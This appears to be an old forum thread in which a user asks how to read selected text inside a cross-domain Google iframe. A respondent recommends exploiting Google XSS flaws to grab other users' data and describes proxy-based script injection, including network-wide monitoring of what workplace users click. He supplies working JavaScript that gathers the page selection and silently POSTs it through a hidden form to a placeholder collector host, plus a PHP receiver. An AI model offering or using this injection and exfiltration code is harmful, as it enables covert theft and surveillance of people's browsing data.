can u read selected text in an iframed google page?!?!?!

jojoba

hi

Welcome to cross domain fun!
I am serving an ASP page.
I have an iframe in the page pointing to another domain, say,
http://www.google.com.
OK, I know, different domains.
I know I can communicate data between the parent page and the iframe
using the fragment identifier technique.
However, I would like to be able to actually get data, via javascript,
to send along this channel.
Specifically, can I, using javascript, ask the google iframe doc for
any selected text (among other things)?
I mean, what's the point of being able to communicate across
cross-domain frames if I can't get data from them in the first place?
I think I'm missing something big here.

Thanks for any help here,
jojoba
 
shimmyshack

What's the point of XSS if you can just ask for the data? However, if
you are just talking about YOUR browser, then you can inject js into
the google iframe to send data back through proxies, so it does depend
on your need. If you are asking "how can I get users to log on to my
website and allow me to grab their google data", the answer is by using
one of the current XSS vulnerabilities in google, or by some browser
security issue, but officially you can't.
 
jojoba

Hi again,
thanks for the rapid response!

shimmyshack, you said:
<<
"then you can inject js into the google iframe to send data back
through proxies"

1) Does "send data back through proxies" mean using another hidden
iframe to proxy? (Not sure I totally understand.)

2) And also, after injecting the js, will I then have full document
access (e.g. get selected text, or mouse position?) or will that still
be limited?

Thanks so much for the help,
jojoba
 
shimmyshack

Well, injecting javascript into the iframe means you can send data
anywhere.
You just have to get that code in there. Normally you would do it
using XSS, but you can do it if you run a local proxy which adds a
bit of code as the html markup passes by, for certain URLs, or merely
using greasemonkey in firefox to inject the script. The script gathers
the required info from the google page, and then sends it either as a
post to an injected iframe (within the google iframe) or via the query
string of an image or whatever.

Imagine you have server A, which you control. You're browsing server A, which
contains an iframe of server B. You inject code into server B's page, which
appends an iframe and gathers data, and posts it back to server A, where
it can be got from the parent page and used, so completing the circle.
It depends on being able to inject code into the server B iframe, which you
can do as it's your machine and you are free to modify the stream as it
arrives. If at work, your proxy can do the same thing net wide. That
makes it possible to inject code that shows IT staff what users click
on and so on... using XSS in a non-SSL page.
Does that all make sense?

It can get more complicated. Imagine the case where you have 2 local
machines, 1 and 2. You browse using 1 with foxyproxy on, with URL
rules matching certain requests to the victim's server (3). You run
apache on 2 with a vhost set up matching the domain name of 3; then
foxyproxy proxies certain URLs matching domain 3 to machine 2, not all
but just some. This means that you are mixing 3 and 2, and provided you
create some logic on 2 you can get complete control of the code
running in your browser, apparently all on the same domain but not, so
you can actually POST back to 2 the data you get from 3. There's no
domain difference, but the data that ends up in the mysql database on 2
can be directly requested by 1, which is browsing a webpage which might
have iframes from domains on 3 and 2; the data can be proxied via
foxyproxy from 2 and mixed...

Anyway, all this makes a mockery of cross domain stuff, as you are only
ever using the same domains for all this. In times past I have used
this to mix and match data between sites where I want a record of
everything I have looked at stored in mysql, and need to avoid
problems with postback and other "domain checks".

Anyway, hope that all made sense.
 
jojoba

Wow!
Thank you shimmyshack.
That was pretty clear, but I still do have a couple of questions (please
excuse my novice-ness).

You said:
<<
You just have to get that code in there, normally you would do it
using XSS, but you can do it if you run a local proxy which adds a
bit of code as the html markup passes by, for certain URLs

Do you recommend I go with XSS instead of the proxy method (I mean, am
I making this too hard)?
Otherwise, if I run a local proxy, does that mean my google iframe is
now within the same domain as the parent document (and so I can access
whatever I want inside that iframe)?

You said:
<<
The script gathers the required info from the google page, and then
sends it either as a post to an injected iframe (within the google
iframe) or via the query string of an image or whatever.

After I have injected the script to retrieve the info, I'm still not
sure how to get that info back out of the google iframe. I see you
mentioned posting it to an injected iframe, but I don't see how the
info in that iframe can be retrieved?

Thanks again for all your help,
jojoba
 
shimmyshack

jojoba said:
<<
Do you recommend I go with XSS instead of the proxy method (I mean, am
I making this too hard)?

I would go with either a proxy, or greasemonkey more probably.

jojoba said:
<<
Otherwise, if I run a local proxy, does that mean my google iframe is
now within the same domain as the parent document (and so I can access
whatever I want inside that iframe)?

See below. Although they are on different domains, the proxy allows
modification of markup as it passes by (you must somehow program your
proxy to inject markup as needed; fiddlertool allows this). This new
markup would be a script to gather data, and an iframe where to post
the data.
jojoba said:
<<
After I have injected the script to retrieve the info, I'm still not
sure how to get that info back out of the google iframe. I see you
mentioned posting it to an injected iframe, but I don't see how the
info in that iframe can be retrieved?


Well, you must run a webserver somewhere with a php page that accepts a
POST payload. Ideally this will be on the same domain as the parent frame.
So:
<?php
// collect.php on your own server: receives the form POST sent by the
// script injected into the google page
var_dump( $_POST );
// shove the data into mysql (or whatever)
?>
The javascript you inject into the google markup /is/ on the same
domain as the google data of course, so it has the right to gather
data.


<script type="text/javascript">
// grab the data you want from google: here, the text the user has selected
var selected = window.getSelection
  ? String(window.getSelection())
  : document.selection.createRange().text; // old IE

// inject a hidden iframe for the POST to land in, so the google page stays put
var sink = document.createElement('iframe');
sink.name = 'sink';
sink.style.display = 'none';
document.body.appendChild(sink);

// inject a form filled out with the gathered data; the action of the form
// dictates where the post payload goes: the url of the above php script
var form = document.createElement('form');
form.method = 'post';
form.action = 'http://YOUR-SERVER/collect.php'; // placeholder: url of your php script
form.target = 'sink';
var field = document.createElement('input');
field.type = 'hidden';
field.name = 'selected';
field.value = selected;
form.appendChild(field);
document.body.appendChild(form);

// now post the form into the iframe; the php script then puts
// the data in mysql or whatever
form.submit();
</script>

Now that you have the data on your server in mysql, you can retrieve
it using ajax or whatever from the parent frame on the same domain.

It is perfectly possible to post data to a different domain; that's the
kind of thing that you do all the time. People use this method for
instance to post to watchfire prefilling the form out, or it is used
to track users on some stats sites. You can use it to gradually
collect data from an entire site as you browse. Greasemonkey is cool
for this, or chickenfoot, as it will do the browsing for you as well.
You might want all the lat/lons from somewhere or whatever, nothing
sinister I hope! Do no dr. evil. 1 milleeon dollars
 
